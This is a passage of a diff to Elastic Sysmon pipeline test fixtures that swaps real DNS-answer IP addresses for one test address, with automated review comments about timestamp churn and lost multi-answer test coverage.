wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" 
@@ -8625,7 +8625,7 @@ "ProcessId": "356", "QueryName": "c.urs.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:40.121.17.79;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;" + "QueryResults": "type: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;" }, "channel": "Microsoft-Windows-Sysmon/Operational", "event_id": "22", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-sysmon-operational-events.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-sysmon-operational-events.json-expected.json index c8b2c0ab2b7..5ecb2c47469 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-sysmon-operational-events.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-sysmon-operational-events.json-expected.json @@ -66,12 +66,12 @@ "type": "CNAME" }, { - "data": "20.190.129.168", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "20.190.129.168" + "89.160.20.156" ] }, "tags": [ @@ -94,7 +94,7 @@ "enterpriseregistration.windows.net" ], "ip": [ - "20.190.129.168" + "89.160.20.156" ] }, "data_stream": { @@ -106,7 +106,7 @@ "name": "Win2018Eval" }, "event": { - "ingested": "2021-10-14T04:10:32.313736090Z", + "ingested": "2021-12-09T13:49:44.739079600Z", "code": "22", "provider": "Microsoft-Windows-Sysmon", "created": "2021-09-14T09:20:46.257Z", @@ -176,12 +176,12 @@ "type": "CNAME" }, { - "data": "23.223.14.67", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.223.14.67" + "89.160.20.156" ] }, "network": { 
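Review bot: The `event.ingested` value in the @@ -106 hunk of test-sysmon-operational-events.json-expected.json is the regeneration wall-clock time, not something the IP substitution affects, and the same churn appears in @@ -198 on the next lines. Unless the comparison already treats `event.ingested` as dynamic, an expected file that pins the ingest time changes on every unrelated regeneration and buries real oracle changes such as the `dns.resolved_ip` updates in this same hunk. If the package's elastic-package version supports it, a `dynamic_fields` entry for `event.ingested` in the pipeline test config would make the comparison ignore it; otherwise the PR description should note that the timestamp lines are expected noise.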
@@ -198,13 +198,13 @@ "go.microsoft.com" ], "ip": [ - "23.223.14.67" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313740111Z", + "ingested": "2021-12-09T13:49:44.739088800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025223900Z'/\u003e\u003cEventRecordID\u003e66\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.239\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ego.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:23.223.14.67;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025223900Z'/\u003e\u003cEventRecordID\u003e66\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.239\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ego.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -272,12 +272,12 @@ "type": "CNAME" }, { - "data": "204.79.197.203", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.79.197.203" + "89.160.20.156" ] }, "network": { 
@@ -294,13 +294,13 @@ "www.msn.com" ], "ip": [ - "204.79.197.203" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313741515Z", + "ingested": "2021-12-09T13:49:44.739094800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025237700Z'/\u003e\u003cEventRecordID\u003e67\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.261\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025237700Z'/\u003e\u003cEventRecordID\u003e67\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.261\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", 
@@ -378,7 +378,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313742920Z", + "ingested": "2021-12-09T13:49:44.739099600Z", "code": "23", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e23\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e23\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-07T08:14:44.489978500Z'/\u003e\u003cEventRecordID\u003e612\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='664' ThreadID='2360'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-07 08:14:44.489\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-c36f-5eb3-2c07-290000000000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2184\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Users\\vagrant\\.gvm\\versions\\go1.13.10.windows.amd64\\bin\\go.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Temp\\1\\go-build583768550\\b001\\test.test.exe\u003c/Data\u003e\u003cData Name='Hashes'\u003eMD5=199E1CF5B2250BD515ECCCF4CA686301,IMPHASH=D90D8C7812AEC8DA0FA173AFA1293AB2\u003c/Data\u003e\u003cData Name='IsExecutable'\u003etrue\u003c/Data\u003e\u003cData Name='Archived'\u003etrue\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -444,17 +444,17 @@
 "type": "CNAME"
 },
 {
- "data": "23.50.53.192",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "23.50.53.195",
+ "data": "89.160.20.156",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "23.50.53.192",
- "23.50.53.195"
+ "89.160.20.156",
+ "89.160.20.156"
 ]
 },
 "network": {
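Review bot: Mapping both A records of this query onto the same address (`"data": "89.160.20.156"` twice in `answers`, and the duplicated pair in `resolved_ip`) removes the only coverage this fixture had for multiple distinct answers, so a regression in how the pipeline keeps their order or de-duplicates them would now go unnoticed; the same collapse happens in the @@ -545, @@ -877 and @@ -1080 hunks. The following @@ -470 hunk shows the `ip` array shrinking from two entries to one, so de-duplication is now exercised only on identical inputs, which is a much weaker check than before. This -expected.json appears to be generated from the input fixture, so the correction belongs in test-sysmon-operational-events.json rather than here: keep one record on 89.160.20.156 and move the other answer(s) of each multi-answer query to a second address from the supported test subset, then regenerate the expected output. If the supported subset offers only one address, that limitation is worth stating in the changelog entry so the lost coverage is visible to the next maintainer.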
@@ -470,14 +470,13 @@ "static-global-s-msn-com.akamaized.net" ], "ip": [ - "23.50.53.192", - "23.50.53.195" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313744140Z", + "ingested": "2021-12-09T13:49:44.739104300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025262300Z'/\u003e\u003cEventRecordID\u003e68\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.449\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-global-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1999.dscg2.akamai.net;::ffff:23.50.53.192;::ffff:23.50.53.195;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025262300Z'/\u003e\u003cEventRecordID\u003e68\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.449\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-global-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1999.dscg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -545,17 +544,17 @@ "type": "CNAME" }, { - "data": "204.79.197.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "13.107.21.200", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -572,14 +571,13 @@ "www.bing.com" ], "ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313745326Z", + "ingested": "2021-12-09T13:49:44.739108200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025273600Z'/\u003e\u003cEventRecordID\u003e69\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.457\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025273600Z'/\u003e\u003cEventRecordID\u003e69\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.457\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", 
@@ -645,7 +643,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313746515Z", + "ingested": "2021-12-09T13:49:44.739111600Z", "code": "13", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e13\u003c/EventID\u003e\u003cVersion\u003e2\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e13\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-05T14:57:40.599567200Z'/\u003e\u003cEventRecordID\u003e2682\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='5496' ThreadID='876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='EventType'\u003eSetValue\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-05 14:57:40.589\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{5b522f6e-77ae-5eb1-2c03-000000000800}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e6072\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\regedit.exe\u003c/Data\u003e\u003cData Name='TargetObject'\u003eHKU\\S-1-5-21-1067164964-2079179834-2367582738-1000\\Software\\Key 1\u003c/Data\u003e\u003cData Name='Details'\u003eDWORD (0x00000004)\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -720,7 +718,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313747797Z", + "ingested": "2021-12-09T13:49:44.739115900Z", "code": "23", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e23\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e23\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-07T07:27:18.722136100Z'/\u003e\u003cEventRecordID\u003e11\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='664' ThreadID='2360'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-07 07:27:18.722\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-b2b6-5eb3-18ab-000000000000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e776\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\LOCAL SERVICE\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\lastalive0.dat\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=115106F5B338C87AE6836D50DD890DE3DA296367\u003c/Data\u003e\u003cData Name='IsExecutable'\u003efalse\u003c/Data\u003e\u003cData Name='Archived'\u003etrue\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -790,12 +788,12 @@
 "type": "CNAME"
 },
 {
- "data": "23.64.104.249",
+ "data": "89.160.20.156",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "23.64.104.249"
+ "89.160.20.156"
 ]
 },
 "network": {
@@ -812,13 +810,13 @@ "linkmaker.itunes.apple.com" ], "ip": [ - "23.64.104.249" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313749071Z", + "ingested": "2021-12-09T13:49:44.739120700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025284200Z'/\u003e\u003cEventRecordID\u003e70\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elinkmaker.itunes.apple.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 linkmaker.itunes.apple.com.edgekey.net;type: 5 e4541.dsce9.akamaiedge.net;::ffff:23.64.104.249;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
